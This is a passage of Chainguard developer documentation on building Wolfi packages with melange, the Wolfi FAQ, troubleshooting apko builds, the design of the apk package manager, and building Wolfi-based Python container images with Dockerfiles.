verify that an artifact was signed by the person who claimed they signed the artifact. Fulcio acts as a trusted party that vouches on behalf of its users that a certain user proved their identity at a certain time. This timestamping is an essential part of the process. The timestamp proves that the signing happened at a particular time and it creates a short time window (about 20 minutes) for the user to sign the artifact that they are signing. A verifying party then needs to check that the artifact they are verifying was not only signed by the party that claims to have signed the artifact, but also that it was done within a valid time window. --- ### Building a Wolfi Package URL: https://edu.chainguard.dev/open-source/wolfi/building-a-wolfi-package/ Last Modified: August 21, 2023 Tags: Wolfi, Procedural Wolfi is a Linux distro created specifically for building stripped-down container images that only include the essential packages needed to run applications in containers. 
This makes it more secure, as there are fewer potential attack vectors due to the reduced surface area. Thanks to a fine-tuned maintenance process combining top-notch automation and established best practices from maintainers, Wolfi packages are updated quickly. This ensures that Wolfi users get patches and the latest versions of packages at a much faster pace than other distributions. Additionally, Wolfi includes a number of features that help to ensure the provenance and authenticity of packages. For example, all packages are built directly from source and signed with cryptographic signatures. This helps to prevent malicious code from being introduced into the system. Wolfi also provides a high-quality build-time SBOM as standard for all packages.

That being said, it's important to note that Wolfi is rather new; it only recently crossed the mark of 1,000 packages in the Wolfi OS repository. That means some packages that you would find in a more established distro won't be available yet in Wolfi.

In this article, we'll cover the whole process involved in building a new Wolfi package, or how a Wolfi package comes to be.

Note: Many of the examples shown in this article are based on the Wolfi PHP package, which is a slightly complex build that generates several subpackages from a single melange YAML file. You can keep that link open in a separate tab to use as a reference as you go through this guide.

How Does it Compile?

The first step in building a new Wolfi package is finding official documentation with guidance on how to build the package from source. All Wolfi packages need to be built from source in order to assure the provenance and authenticity of package contents. Because Wolfi uses apk and thus has some similar design principles to Alpine, it is a good idea to review the Alpine package index to find out how the package is built there. This can give you insights about configuration options, dependencies, and potential subpackages that can be stripped from the main package.

For example, when compiling PHP from source, you have the choice of compiling several extensions either as built-in or as shared libraries. Although compiling said extensions as built-in packages makes for a simpler build, it also increases the size of the original package and creates a wider surface for possible vulnerabilities.

If you aren't very familiar with building packages from source using tools such as cmake and autoconf, it's a good idea to compile the package locally first - you don't need to run make install at the end to get the package installed on your own system, but running the configure and make processes will give you a better understanding of the build requirements and configure options.

The melange YAML File

The melange YAML file is where you'll define the details about the package and its build pipeline. If you are familiar with GitHub Actions, you'll find that melange definitions are very similar to GitHub Actions workflows.

The package Section

The melange YAML file starts with a package section, used to define metadata information and runtime dependencies. The following excerpt demonstrates how this section is declared in the Wolfi PHP package YAML:

package:
  name: php
  version: 8.2.8
  epoch: 0
  description: the PHP programming language
  copyright:
    - license: PHP-3.01
  dependencies:
    runtime:
      - libxml2

Package name: the current convention is to use the same name as the YAML file without the extension.
This is what people will search for, so it's a good idea to keep it consistent with how the package is named in other distributions. Description: this information shows up when searching for the package with apk. Version: the version of the package. Epoch: a numeric field set to zero by default; this only needs to be incremented when there is a non-version change in the package. For instance, when build options such as compiler flags have changed or new subpackages have been added but the upstream package version hasn't changed — in such cases, you'd need to "bump the epoch" in order to trigger the build. License: the package license. It is important to note that only packages with OSI-approved licenses can be included in Wolfi. You can check the relevant package info in the licenses page at opensource.org. Runtime dependencies: any dependencies needed by your package at runtime. Not to be confused with build dependencies, these will come up in the environment section of the file.

The environment Section

The next section is the environment section. It defines how the build environment should look in order to build your package. Packages listed in this section won't be included in the final package, because they are only needed at build time. When building locally, you'll also need to include information about where to find Wolfi packages. This is not needed when submitting the package to the Wolfi OS repository. The contents node is used for that:

environment:
  contents:
    repositories:
      - https://packages.wolfi.dev/os
    keyring:
      - https://packages.wolfi.dev/os/wolfi-signing.rsa.pub

The packages section is where you can define dependencies. The following example is an excerpt from the Wolfi PHP package, which is a fairly complex build with many dependencies:

environment:
  contents:
    packages:
      - build-base
      - busybox
      - file
      - bison
      - libtool
      - ca-certificates-bundle
      - bzip2-dev
      - libxml2-dev
      - curl-dev
      - openssl-dev
      - readline-dev
      - sqlite-dev
      - libsodium-dev
      - libpng-dev
      - libjpeg-turbo-dev
      - libavif-dev
      - libwebp-dev
      - libxpm-dev
      - libx11-dev
      - freetype-dev
      - gmp-dev
      - icu-dev
      - openldap-dev
      - oniguruma-dev
      - libxslt-dev
      - postgresql-15-dev
      - libzip

Don't worry if you don't know everything you'll need upfront at build time. Even if you build the package locally first, your system most likely has many dependencies already installed; by paying attention to the output provided by melange, you will be able to figure out what is missing, and iterate until your build environment looks right. One thing that may happen during this process is finding out that one or more dependencies needed by your package are not yet available in Wolfi, so they need to be built first. It is a normal part of the process, so don't worry — you will be able to build incrementally and test everything locally.
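One quick way to check whether a dependency is already packaged in Wolfi is to search the package index from a wolfi-base container. This is an illustrative sketch rather than part of the original guide; the package name is just an example:

```sh
# Search the Wolfi index for a build dependency before adding it to your environment
docker run --rm cgr.dev/chainguard/wolfi-base:latest \
  sh -c "apk update && apk search oniguruma-dev"
```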
Luckily for us, melange bakes a lot of repetitive tasks into reusable pipelines:

Downloading Packages: fetch, git-checkout
Autoconf: autoconf/configure, autoconf/make, autoconf/make-install
Cmake: cmake/build, cmake/configure, cmake/install
Go: go/build, go/install
Meson: meson/compile, meson/configure, meson/install
Ruby: ruby/build, ruby/clean, ruby/install
Split: split/debug, split/dev, split/infodir, split/locales, split/manpages, split/static
Other: strip, patch

Each pipeline can have one or more parameters that should be provided as key/value pairs in a with entry. For example, a download-and-verify step has the following structure in the melange YAML, using the built-in fetch pipeline:

- uses: fetch
  with:
    uri: https://libzip.org/download/libzip-${{package.version}}.tar.gz
    expected-sha256: 52a60b46182587e083b71e2b82fcaaba64dd5eb01c5b1f1bc71069a3858e40fe

Naturally, you can also run raw bash commands in your pipeline. The following example shows the build of Composer, the PHP package manager, which is not compiled as a typical package:

- name: Install Composer
  runs: |
    EXEC_DIR="${{targets.destdir}}/usr/bin"
    mkdir -p "${EXEC_DIR}"
    mv composer.phar "${EXEC_DIR}/composer"
    chmod +x "${EXEC_DIR}/composer"

As indicated, a pipeline step will have either a uses or a runs directive. You can have as many steps as you need, and you can use special variable substitutions inside steps:

${{package.name}}: Package name.
${{package.version}}: Package version.
${{package.epoch}}: Package epoch.
${{targets.destdir}}: Directory where final package files will be stored. Everything that lives here will be packed into your final apk.
${{targets.subpkgdir}}: Directory where final subpackage files will be stored. Works the same way as targets.destdir, but for subpackages.

You can find more details about available pipelines in the melange pipelines documentation.

The subpackages Section

As mentioned previously, a package may extract parts of its contents into subpackages in order to make for a slimmer final apk. Many packages have resources that are not required at execution time, including development headers, man pages, and shared libraries that are optional. This part is really important in Wolfi, because we want packages to be minimal.

The subpackages section of the melange YAML file looks a lot like the pipeline section, and it essentially works the same way. You'll just have to make sure you place any subpackage files in the targets.subpkgdir location. The split built-in pipelines were created to facilitate the creation of subpackages. They implement code to remove development headers (split/dev), man pages (split/manpages), among other resources that aren't typically required at runtime. You can experiment with those; just be aware that they use standard path locations and some compiled packages may use different paths for certain resources.

For example, this is how a step in the subpackages section would be written, using the split/dev built-in pipeline to generate the php-dev subpackage:

- name: php-dev
  description: PHP 8.2 development headers
  pipeline:
    - uses: split/dev

Looping with Ranges

In some cases, you may find yourself repeating the same task over and over with just a couple of different values (such as package names). In such scenarios, you can define a range of data that you can "loop" through in a step. For example, let's have a look at how the PHP package uses this feature to create its subpackages. First, we define an extensions range.
This should go in a data node at the same level as the pipeline section of your YAML:

data:
  - name: extensions
    items:
      bz2: Bzip2
      curl: cURL
      gd: GD imaging
      gmp: GNU GMP support
      ldap: LDAP
      mysqlnd: MySQLnd
      openssl: OpenSSL
      pdo_mysql: MySQL driver for PDO
      pdo_sqlite: SQLite 3.x driver for PDO
      soap: SOAP
      sodium: Sodium
      calendar: Calendar

In the subpackages section, we define a pipeline for that range:

- range: extensions
  name: "php-${{range.key}}"
  description: "The ${{range.value}} extension"
  pipeline:
    - runs: |
        export EXTENSIONS_DIR=usr/lib/php/modules
        export CONF_DIR="${{targets.subpkgdir}}/etc/php/conf.d"
        mkdir -p "${{targets.subpkgdir}}"/$EXTENSIONS_DIR $CONF_DIR
        mv "${{targets.destdir}}/$EXTENSIONS_DIR/${{range.key}}.so" \
          "${{targets.subpkgdir}}/$EXTENSIONS_DIR/${{range.key}}.so"
        prefix=
        [ "${{range.key}}" != "opcache" ] || prefix="zend_"
        echo "${prefix}extension=${{range.key}}.so" > $CONF_DIR/"${{range.key}}.ini"

And this will loop through all values of the extensions range and execute the described pipeline.

The update Section

This final section of the YAML file is only required when submitting the package to the Wolfi OS repository. The update section is used by Wolfi CI/CD systems to detect new package releases. Wolfi uses multiple tools and services to keep track of upstream releases, including the Release Monitoring service. For packages that are released via GitHub, tracking occurs using the project org/name and a monitored tag.

Here's an example of the update section of the PHP package, which uses the Release Monitoring service:

update:
  enabled: true
  release-monitor:
    identifier: 3627

You can obtain the identifier from the release monitoring page - search for the package and grab the ID that shows up in the URL. Here is another example, this time from a package that is released via GitHub:

update:
  enabled: true
  github:
    identifier: php-amqp/php-amqp
    strip-prefix: v
    tag-filter: v

Again, this section is only required when submitting the package to Wolfi. For more details about Wolfi's automated package updates, check the official docs on the subject.

Building Packages

When you feel your YAML is good for a first run, it's time to build the package with melange. In this guide we'll use Docker to execute melange in a local environment, using Wolfi's SDK image. This image contains everything you need to build Wolfi packages with melange and Wolfi-based images with apko. The procedure to build apk packages with melange is explained in more detail in our Getting Started with melange tutorial.

Setting Up a Local Development Environment

Start by cloning the wolfi-dev/os repository to your local machine. If you plan on sending a pull request to Wolfi later, you may want to create a fork now and clone your fork instead (see the fork setup sketch at the end of this section).

git clone https://github.com/wolfi-dev/os.git

From the root of the project, run the following command to build your Docker-based development environment:

make dev-container

This will create an ephemeral container based on the Wolfi SDK image, with a few predefined settings. We'll call this your Wolfi development environment.

❯ make dev-container
docker run --privileged --rm -it \
    -v "/home/erika/Projects/os:/home/erika/Projects/os" \
    -w "/home/erika/Projects/os" \
    -e SOURCE_DATE_EPOCH=0 \
    ghcr.io/wolfi-dev/sdk:latest@sha256:99babbe4897d68ec1a342bd958fda7274a072bf112670fa691f64753b04774a9
Welcome to the development environment!
[sdk] ❯

You are now ready to build your Wolfi package.
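If you chose to work from a fork as mentioned above, a common arrangement (sketched here with a placeholder username) is to clone your fork and track wolfi-dev/os as an upstream remote:

```sh
# Clone your fork instead of the upstream repository (replace <your-username>)
git clone https://github.com/<your-username>/os.git
cd os

# Keep a reference to the upstream wolfi-dev/os repository for syncing later
git remote add upstream https://github.com/wolfi-dev/os.git
git fetch upstream
```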
Building a Package

To build a package, run the following command from your Wolfi SDK environment:

make package/<your-package-name>

For instance, to build PHP 8.3, which is defined in a file named php-8.3.yaml, you would run make package/php-8.3:

[sdk] ❯ make package/php-8.3
make yamlfile=php-8.3.yaml pkgname=php-8.3 packages/x86_64/php-8.3-8.3_rc3-r1.apk
make[1]: Entering directory '/home/erika/Projects/os'
##############################################################
#          build output - removed for readability            #
##############################################################
ℹ️ | signing apk index at packages/x86_64/APKINDEX.tar.gz
ℹ️ | signing index packages/x86_64/APKINDEX.tar.gz with key local-melange.rsa
ℹ️ | appending signature to index packages/x86_64/APKINDEX.tar.gz
ℹ️ | writing signed index to packages/x86_64/APKINDEX.tar.gz
ℹ️ | signed index packages/x86_64/APKINDEX.tar.gz with key local-melange.rsa
make[1]: Leaving directory '/home/erika/Projects/os'
[sdk] ❯

When the build is finished, you can find the newly built apk(s) in a ./packages directory, in the root of your cloned Wolfi repository.

When the build fails

It is likely that your build won't work on the first run, and that is completely normal because there are many moving parts and hidden dependencies when building packages from source. In this scenario, it is often useful to check the build environment, which is preserved for debugging. The build output will inform you where to find these files in your development environment.

2023/10/25 15:37:27 ERROR: failed to build package. the build environment has been preserved:
ℹ️ x86_64 | workspace dir: /tmp/melange-workspace-4269468499
ℹ️ x86_64 | guest dir: /tmp/melange-guest-3734950176

The workspace dir is where you will find the melange_out directory, which contains the output of your package. The guest dir contains the filesystem of your build environment.

Another useful strategy is to include set -x before commands in your pipeline, in order to get extended debug information.

- name: Install Composer
  runs: |
    set -x
    EXEC_DIR="${{targets.destdir}}/usr/bin"
    mkdir -p "${EXEC_DIR}"
    mv composer.phar "${EXEC_DIR}/composer"
    chmod +x "${EXEC_DIR}/composer"

Most build issues are caused by missing dependencies, even when the error message might be misleading. Another common cause of build errors is wrong file or directory paths. The melange documentation has more pointers to help with debugging, in case you need it.

As mentioned before, there might be cases where you'll need to first build a dependency, and then use this dependency to build the package you need. When working with local dependencies, use the following notation in your packages list, inside the environment section:

environment:
  contents:
    repositories:
      - https://packages.wolfi.dev/os
      - '@local /work/packages'
    keyring:
      - https://packages.wolfi.dev/os/wolfi-signing.rsa.pub
    packages:
      - busybox
      - mypackage@local

This will look for a package named "mypackage" in your local packages/ folder.

When the build is successful

First of all, celebrate!
🎉 Check the packages folder, you should find a directory for each built architecture (in my case I get x86_64) with your built apks (package + subpackages) along with an APKINDEX.tar.gz file: ./php-full-wolfi-demo/packages/x86_64 ├── APKINDEX.tar.gz ├── php-8.2.7-r1.apk ├── php-amqp-1.11.0-r0.apk ├── php-bcmath-8.2.7-r1.apk ├── php-bz2-8.2.7-r1.apk ├── php-calendar-8.2.7-r1.apk ├── php-cgi-8.2.7-r1.apk ├── php-ctype-8.2.7-r1.apk ├── php-curl-8.2.7-r1.apk ├── php-dbg-8.2.7-r1.apk ├── php-dev-8.2.7-r1.apk ├── php-dom-8.2.7-r1.apk ├── php-exif-8.2.7-r1.apk … In the next section, we’ll demonstrate how you can use the Wolfi SDK for running these checks. Testing your Packages With a successful build, it’s time to test the packages to make sure they are installable and functional, and also to verify they are free of CVEs. Local Installation The first test you’ll want to run with your package is to check if you can use apk to install it without errors. For that, we’ll use the local-wolfi environment, which brings up a new container environment using the Wolfi-base image, with additional settings to make your new package available in the test environment alongside the melange keys that were created to sign your package at build time. We’ll call this your Wolfi Test Environment. make local-wolfi ❯ make local-wolfi docker run --rm -it \ --mount type=bind,source="/home/erika/Projects/os/packages",destination="/work/packages",readonly \ --mount type=bind,source="/home/erika/Projects/os/local-melange.rsa.pub",destination="/etc/apk/keys/local-melange.rsa.pub",readonly \ --mount type=bind,source="/tmp/tmp.LXnQu0hkFn/repositories",destination="/etc/apk/repositories",readonly \ -w "/work/packages" \ cgr.dev/chainguard/wolfi-base:latest d2df519c59df:/work/packages# Your newly built packages should now be available for installation from this environment via apk add. You should use the full path to the .apk file, for instance: apk add ./x86_64/composer-2.6.5-r0.apk Make sure the package can be installed without errors, including dependencies. Checking for CVEs Checking the package for CVEs is a good practice to avoid submitting unpatched packages into Wolfi. If CVEs are found, you may want to apply a security patch before submitting your package, if that is available. From your Wolfi development environment, run the following command, providing the full path to your .apk file: [sdk] ❯ wolfictl scan ./packages/x86_64/composer-2.6.5-r0.apk 🔎 Scanning "./packages/x86_64/composer-2.6.5-r0.apk" ✅ No vulnerabilities found [sdk] ❯ For more information about patching CVEs in Wolfi, check the official docs on this subject. Submitting the Package to Wolfi OS Once you are satisfied with your set of packages and subpackages, you may consider submitting your package to Wolfi OS. From this point, the process is essentially the following: Create a fork of the wolfi-dev/os repository Create a branch with the name of your package, for instance: add-php-package Remove the repositories and keyring sections of the YAML file Add the release-monitor info to the YAML file Run yam to fix any YAML formatting issues Create a signed commit Open a pull request following the instructions from the PR template. The Wolfi Contributing Guide on GitHub has more details about this process. Resources to Learn More If you haven’t yet, check the Wolfi PHP package source file for a more comprehensive view of the melange YAML structure and how that looks in a more complex build. 
If you’d like to learn more about Wolfi, check the documentation and FAQ for more details about the ecosystem surrounding it. --- ### Wolfi FAQs URL: https://edu.chainguard.dev/open-source/wolfi/faq/ Last Modified: January 8, 2025 Tags: Wolfi, FAQ What is Wolfi and how does it compare to Alpine? Wolfi is our Linux undistro designed from the ground up to support newer computing paradigms such as containers. Although Wolfi has a few similar design principles as Alpine (such as using apk), it is a different distribution that is focused on supply chain security. Unlike Alpine, Wolfi does not currently build its own Linux kernel, instead relying on the host environment (e.g. a container runtime) to provide one. Why build a new Linux distribution from scratch? Without building packages from source, you are at the mercy of an intermediary provider (such as Debian or Alpine) for obtaining the software you need, and none of those intermediaries offer our SLA around zero CVEs. Each intermediary also joins your supply chain’s root of trust. We built Wolfi to achieve an unmatched CVE SLA where Chainguard is the only intermediary you need to trust. The following resources have more details around why and how we built Wolfi: Building the first memory safe distro Building Wolfi from the ground up Wolfi: a new paradigm in Linux for containers Fully bootstrapping Java from source in Wolfi Fully bootstrapping Go from source in Wolfi Is Wolfi free to use? Yes, Wolfi is free and will always be. Can I mix packages from Alpine repositories into a Wolfi-based image? No, it’s not possible to mix Alpine apks with Wolfi apks. If your image requires dependencies that are currently only available for Alpine, you might consider opening a new issue in the wolfi-os repository to suggest the new package addition, or use melange to build a custom apk for your image. How can I find which packages are available in Wolfi? You can search for available packages using the apk search command from within a Wolfi container, as explained in the Searching for Packages section of our Migrating to Chainguard Containers guide. You can also use our APK Explorer tool for a web-based search on the Wolfi repositories. Can I use Wolfi on the Desktop? No. Wolfi is an un-distro, or distroless base to be used within the container / OCI ecosystem. Desktop distributions require additional software that is out of scope for Wolfi’s roadmap. Who maintains Wolfi? Wolfi was created and is currently maintained by Chainguard. What are the plans for long-term Wolfi governance? We intend for Wolfi to be a community-driven project, which means over time it will have multi-vendor governance and maintainers. For now we’re focused on building the project and community, and will revisit this in several months when a community has formed. Where can I get security feeds for Wolfi? See SECURITY.md for information about reporting security incidents concerning and consuming security data about Wolfi. 
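As a rough, unofficial pointer for the security-feeds question above: Wolfi advisory data is commonly consumed by scanners as an Alpine-style secdb JSON feed. The URL below is an assumption based on community tooling and should be confirmed against SECURITY.md before you rely on it:

```sh
# Fetch the Wolfi secdb feed (URL assumed; verify against SECURITY.md)
curl -sL https://packages.wolfi.dev/os/security.json | head -c 300
```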
--- ### Troubleshooting apko Builds URL: https://edu.chainguard.dev/open-source/build-tools/apko/troubleshooting/ Last Modified: August 10, 2022 Tags: apko, Troubleshooting Debug Options To include debug-level information on apko builds, add --debug to your build command: docker run --rm -v ${PWD}:/work cgr.dev/chainguard/apko build --debug \ apko.yaml hello-minicli:test hello-minicli.tar \ -k melange.rsa.pub Common Errors When the apk package manager is unable to resolve your requirements to a set of installable packages, you will get an error similar to this: Error: failed to build layer image: initializing apk: failed to fixate apk world: exit status 1 There are two main root causes for this error, which we’ll explain in more detail in the upcoming section: apk cannot find the package in the included repositories, or apk cannot find the apk index for your custom-built packages. The requested package is not in the included repositories Make sure you’ve added the relevant package repositories you need and the package name is correct. Check the Wolfi repository for available packages if you are building Wolfi images, or the Alpine APK index if you are using Alpine as base. If this is your case, you should find error messages similar to this when enabling debug info with the --debug flag: ERROR: unable to select packages: hello-minicli (no such package) apko is unable to find the local packages folder With melange-built package(s), make sure you have a volume sharing your apko / melange files with the location /work inside the apko container. The apk index is missing If you have a functional volume sharing your packages with the apko container and you’re still getting this error, make sure you built a valid apk index as described in step 4 of the Getting Started with melange Guide. If this is your case, you should find error messages similar to this when enabling debug info with the --debug flag: ERROR: Not committing changes due to missing repository tags. Use --force-broken-world to override. This is how your packages directory tree should be set up, including the APKINDEX.tgz file for each architecture: packages ├── aarch64 │ ├── APKINDEX.tar.gz │ └── hello-minicli-0.1.0-r0.apk ├── armv7 │ ├── APKINDEX.tar.gz │ └── hello-minicli-0.1.0-r0.apk ├── x86 │ ├── APKINDEX.tar.gz │ └── hello-minicli-0.1.0-r0.apk └── x86_64 ├── APKINDEX.tar.gz └── hello-minicli-0.1.0-r0.apk 4 directories, 8 files Further Resources For additional guidance, please refer to the apko repository on GitHub, where you can find more examples or open an issue in case of problems. --- ### Why apk URL: https://edu.chainguard.dev/open-source/wolfi/apk-package-manager/ Last Modified: July 6, 2022 Tags: apko, Conceptual apko uses the apk package manager to compose container images based on declarative pipelines. The apk format was introduced by Alpine Linux to address specific design requirements that could not be met by existing package managers such as apt and dnf. But what makes it different, and why does that matter in the context of apko? Manipulating the Desired State In traditional package managers like dnf and apt, requesting the installation or removal of packages causes those packages to be directly installed or removed, after a consistency check. In apk, when you run apk add package1 to add a package or apk del package2 to delete a package, package1 and package2 are added (or removed) as a dependency constraint in /etc/apk/world, which describes the desired system state. 
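To make the desired-state model concrete, here is a small sketch you can try inside a Wolfi or Alpine container; the package name is only an example:

```sh
cat /etc/apk/world   # the current desired state, one constraint per line
apk add curl         # records "curl" as a constraint in /etc/apk/world and installs it
cat /etc/apk/world   # "curl" now appears in the desired state
apk del curl         # removes the constraint; the package is removed as a side effect
```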
Package installation or removal is done as a side effect of modifying this system state. It is also possible to edit /etc/apk/world with the text editor of your choice and then use apk fix to synchronize the installed packages with the desired system state. Because of this design, you can also add conflicts to the desired system state to prevent bringing in certain packages. For example, there was a bug in Alpine in 2021 where pipewire-pulse was preferred over pulseaudio because the former had a simpler dependency graph. This did not prove to be a problem though, as users could add a conflict against pipewire-pulse by running apk add !pipewire-pulse, thus preventing the package from being brought in. Another result of this design is that apk will never commit a change to the system that leaves it unbootable. If it cannot verify the correctness of the requested change, it will back out adding the constraint before attempting to change what packages are actually installed on the system. This allows the apk dependency solver to be rigid: there is no way to override or defeat the solver other than providing a scenario that results in a valid solution. Verification and Unpacking in Parallel to Package Fetching Unlike other package managers, apk is completely driven by the package fetching I/O when installing or upgrading packages. When the package data is fetched, it is verified and unpacked on the fly. This allows package installations and upgrades to be extremely fast. To make this safe, package contents are initially unpacked to temporary files and then atomically renamed once the verification steps are complete and the package is ready to be committed to disk. Constrained Solver Lately, traditional package managers have promoted their advanced SAT solvers for resolving complicated constraint issues automatically. For example, aptitude is capable of solving Sudoku puzzles. apk’s lack of these solvers can actually be considered a feature. While it is true that apk does have a deductive dependency solver, it does not perform backtracking. The solver is also constrained: it is not allowed to make changes to the /etc/apk/world file. This ensures that the solver cannot propose a solution that will leave your system in an inconsistent state. Trying to make a smart solver instead of appropriately constraining the problem can indicate a poor design choice. The fact that apt, aptitude, and dnf have all written code to constrain their SAT solvers in various ways proves this point. Fast and Safe Package Management Package managers can be made to go fast — and can be safe while doing so — but require a careful design that is well-constrained. apk makes its own tradeoffs: a less powerful but easy to audit solver, trickier parallel execution instead of phase-based execution. These were the right decisions for apk, but may not be the right decisions for other distributions. Final Considerations The reproducible nature of apk makes it the ideal solution for declarative pipelines, since it allows you to describe your desired system state without having to implement a series of individual steps that are not guaranteed to reach completion. When the apk dependency solver is unable to reach an installable set of packages, the build fails, without causing incomplete system changes. This is the ideal behavior for automated pipelines since it eliminates the need for rollbacks, in addition to avoiding the risks of inconsistent environments. An earlier version of this article was published on Ariadne Conill’s Blog. 
--- ### Hello Wolfi Workshop URL: https://edu.chainguard.dev/open-source/wolfi/hello-wolfi/ Last Modified: November 22, 2024 Tags: Wolfi, Workshop Introduction Software supply chain threats have been growing exponentially in the last few years, according to industry leaders and security researchers (PDF). With the popularization of automated workflows and cloud native deployments, it is more important than ever to provide users with the ability to attest the provenance of all relevant software artifacts that compose the container images being used as build and production runtimes. In this workshop, you’ll learn more about Wolfi, a community Linux undistro designed for the container and cloud-native era. You’ll also learn about melange and apko, Chainguard’s open source toolkit created to build more secure container images. Note: This presentation was recorded on November 16, 2022. Although most of the content holds true to date, some commands and configurations have changed, which caused the demo to become obsolete. For a more up-to-date resource on how to build Wolfi packages, check the Building a Wolfi Package guide. If you are looking for Wolfi-based images for your containerized workloads, check our Images Directory. --- ### Creating Wolfi Images with Dockerfiles URL: https://edu.chainguard.dev/open-source/wolfi/wolfi-with-dockerfiles/ Last Modified: August 1, 2024 Tags: Wolfi, Procedural Introduction Wolfi is a minimal open source Linux distribution created specifically for cloud workloads, with an emphasis on software supply chain security. Using apk for package management, Wolfi differs from Alpine in a few important aspects, most notably the use of glibc instead of musl and the fact that Wolfi doesn’t have a kernel as it is intended to be used with a container runtime. This minimal footprint makes Wolfi an ideal base for both distroless images and fully-featured builder images. A distroless image is a minimal container image that typically doesn’t include a shell or package manager. The extra tightness improves security in several aspects, but it requires a more sophisticated strategy for image composition since you can’t install packages so easily. Wolfi-based builder images are still a better and more secure option to use as base images in your Dockerfile than using a full-fledged Linux distribution, as they are smaller and have fewer CVEs. You can learn more about distroless in our Going Distroless guide. The wolfi-base image, which we’ll be using in this tutorial, is not distroless because it includes apk-tools and bash. In some cases, it can still be used to build a final distroless image, when combined with a distroless runtime in a Docker multi-stage build. That depends on the complexity of the image, the number of dependencies required, and whether these dependencies are system libraries or language ecosystem packages, for example. In this article, we’ll learn how to leverage Wolfi to create safer runtime environments based on containers. To demonstrate Wolfi usage in a Dockerfile workflow (using a Dockerfile to build your image), we’ll create an image based on the wolfi-base image maintained by Chainguard. The goal is to have a final runtime image able to execute a Python application. Step 4 of this guide, which is optional, demonstrates how to turn that into a distroless image by combining it with a Python distroless image, also provided by Chainguard. Requirements You’ll need Docker to build and run the application. 
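To see the contrast between wolfi-base and a distroless image in practice, here is a quick, hedged check (not part of the original tutorial) that assumes Docker and access to cgr.dev:

```sh
# wolfi-base includes apk and a shell, so running a shell command works:
docker run --rm cgr.dev/chainguard/wolfi-base:latest sh -c "apk --version"

# The distroless Python image has no shell, so forcing one should fail:
docker run --rm --entrypoint sh cgr.dev/chainguard/python:latest || echo "no shell in the distroless image"
```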
Step 1: Obtaining the Demo Application

We'll use the same demo application from the Getting Started with the Python Chainguard Image tutorial to demonstrate how to build a Wolfi Python image with a Dockerfile. The application files are available in the edu-images-demos repository. We'll start by cloning that repository into a temporary folder so that we can obtain the relevant application files to run the second demo from that tutorial.

The following command will clone the demos repository into your /tmp folder:

mkdir /tmp/images-demos && \
git clone https://github.com/chainguard-dev/edu-images-demos.git \
/tmp/images-demos

We'll now copy the demo application to a location inside your home folder.

mkdir ~/linky && cp -R /tmp/images-demos/python/linky/* ~/linky/

You can now enter the newly created directory in your home folder and inspect its contents:

cd ~/linky && ls -la

This application will take in an image (linky.png) file and convert it to ANSI escape sequences to render it on the CLI. The code is in the linky.py file, while the requirements.txt file has the dependencies required by the application: setuptools and climage. For your reference, here is the complete linky.py script:

'''import climage module to display images on terminal'''
from climage import convert


def main():
    '''Take in PNG and output as ANSI to terminal'''
    output = convert('linky.png', is_unicode=True)
    print(output)


if __name__ == "__main__":
    main()

You'll notice that there's already a Dockerfile in that directory, but it uses the Python Chainguard image in a multi-stage build. In the next step, we'll replace that with a new Dockerfile that uses the wolfi-base image to build a Python image from scratch, using Wolfi apks.

Step 2: Creating the Dockerfile

Now we'll create the Dockerfile to run the application. This Dockerfile will set up a new user and WORKDIR, copy relevant files, and install dependencies with Pip. It will also define the entry point that will be executed when we run this image with docker run.

You can rename the old Dockerfile if you want to keep it for tests later.

mv Dockerfile _DockerfileBkp

Then, create a new Dockerfile:

nano Dockerfile

Copy the following content to it:

FROM cgr.dev/chainguard/wolfi-base

ARG version=3.12

WORKDIR /app

RUN apk add python-${version} py${version}-pip && \
    chown -R nonroot:nonroot /app/

USER nonroot

COPY requirements.txt linky.png linky.py /app/

RUN pip install -r requirements.txt --user

ENTRYPOINT [ "python", "/app/linky.py" ]

This Dockerfile uses a variable called version to define which Python version is going to be installed in the resulting image. You can change this to one of the Python versions available in Wolfi. To find out which versions are available, please refer to the Searching for Packages section of our migration guide.

Save the file when you're done. In the next step, we'll build and run the image with docker.

Step 3: Building and Running the Image

With the Dockerfile ready, you can now build your application runtime. If you're on macOS, make sure Docker is running.

Build your image with:

docker build . -t linky-demo

If you run into issues, try using sudo.

Finally, run the image with:

docker run --rm linky-demo

You'll receive a representation of the Chainguard Linky logo on the command line.
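Two optional, hedged checks you can run at this point: confirm which interpreter the version build argument installed by overriding the entrypoint, and rebuild with a different version if that version is packaged in Wolfi:

```sh
# Print the Python version inside the image by bypassing the application entrypoint
docker run --rm --entrypoint python linky-demo --version

# Rebuild with another Python version, assuming that version is available in Wolfi
docker build . -t linky-demo --build-arg version=3.11
```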
Step 4 (Optional): Composing Distroless Images in a Docker Multi-Stage Build

As discussed in the introduction, in some cases it is possible to combine your fully-featured image with a distroless runtime in a Docker multi-stage build, and this will give you a final image that is also distroless. Keep in mind that this technique for building distroless images is only viable when there aren't additional system dependencies that require installation via apk.

The Getting Started with Python tutorial shows in detail how to accomplish that using a -dev variant as builder, and the distroless Chainguard Python image as production image. You can also accomplish the same results by using your newly-built image based on wolfi-base in place of the -dev variant of the Python image. We'll change the build to use a virtual environment to package the dependencies and add an extra step to create the final image.

The following Dockerfile uses a multi-stage build to obtain a final distroless image that contains everything the application needs to run. The build requires additional software that is not carried along to the final image.

Open a new file and call it DockerfileDistroless:

nano DockerfileDistroless

Copy the following code into your new file:

FROM cgr.dev/chainguard/wolfi-base AS builder

ARG version=3.12

ENV LANG=C.UTF-8
ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1
ENV PATH="/app/venv/bin:$PATH"

WORKDIR /app

RUN apk update && apk add python-$version py${version}-pip && \
    chown -R nonroot:nonroot /app/

USER nonroot

RUN python -m venv /app/venv

COPY requirements.txt /app/

RUN pip install --no-cache-dir -r requirements.txt

FROM cgr.dev/chainguard/python:latest

ENV PYTHONUNBUFFERED=1
ENV PATH="/app/bin:$PATH"

WORKDIR /app

COPY --from=builder /app/venv /app
COPY linky.py linky.png /app/

ENTRYPOINT [ "python", "/app/linky.py" ]

Save and close the file when you're finished.

Now, build this image using a custom tag so that you can compare the previously built linky-demo image with its distroless version:

docker build . -f DockerfileDistroless -t linky-demo:distroless

If you run the new image, it should give you the same result as before.

docker run --rm linky-demo:distroless

But these images are not the same. The following command will give you a glimpse of their differences:

docker images linky-demo

REPOSITORY   TAG          IMAGE ID       CREATED          SIZE
linky-demo   distroless   619ef9b6c52d   6 seconds ago    90.3MB
linky-demo   latest       4832e9093348   4 minutes ago    110MB

You'll notice that the :distroless version is significantly smaller, because it doesn't carry along all the software necessary to build the application. More important than size, however, is the smaller attack surface that results in fewer CVEs.

Final Considerations

